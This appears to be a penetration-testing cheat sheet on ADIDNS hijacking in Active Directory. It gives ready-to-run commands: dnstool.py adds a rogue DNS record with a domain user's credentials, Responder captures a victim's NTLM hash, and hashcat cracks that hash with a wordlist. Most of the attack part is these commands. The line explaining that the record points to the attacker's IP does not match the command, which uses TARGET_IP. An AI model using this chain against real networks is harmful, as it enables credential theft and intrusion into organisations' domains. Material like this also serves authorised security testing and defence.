ADIDNS Hijacking
ADIDNS Hijacking
Tools: dnstool.py, responder, Powermad, Invoke-DNSUpdate
Requirements:
A victim tries to connect to a domain that is NOT CONFIGURED, which means that we can make the domain point to OUR IP address instead.
python3 dnstool.py -u DOMAIN.LOCAL\\USER.NAME -p 'PASS' DOMAIN.LOCAL -r HIJACKED.DOMAIN.LOCAL -a add -d TARGET_IP -dns-ip OUR_IP
sudo responder -I tun0 (Capture NTLM Hash of victim)
hashcat -m 5600 -a 0 ntlmhash.txt /usr/share/wordlist/rockyou.txt (Crack hash)ADIDNS Poisoning
Wildcard attack with Powermad
DNS update with Invoke-DNSUpdate
dnstool python tool
Last updated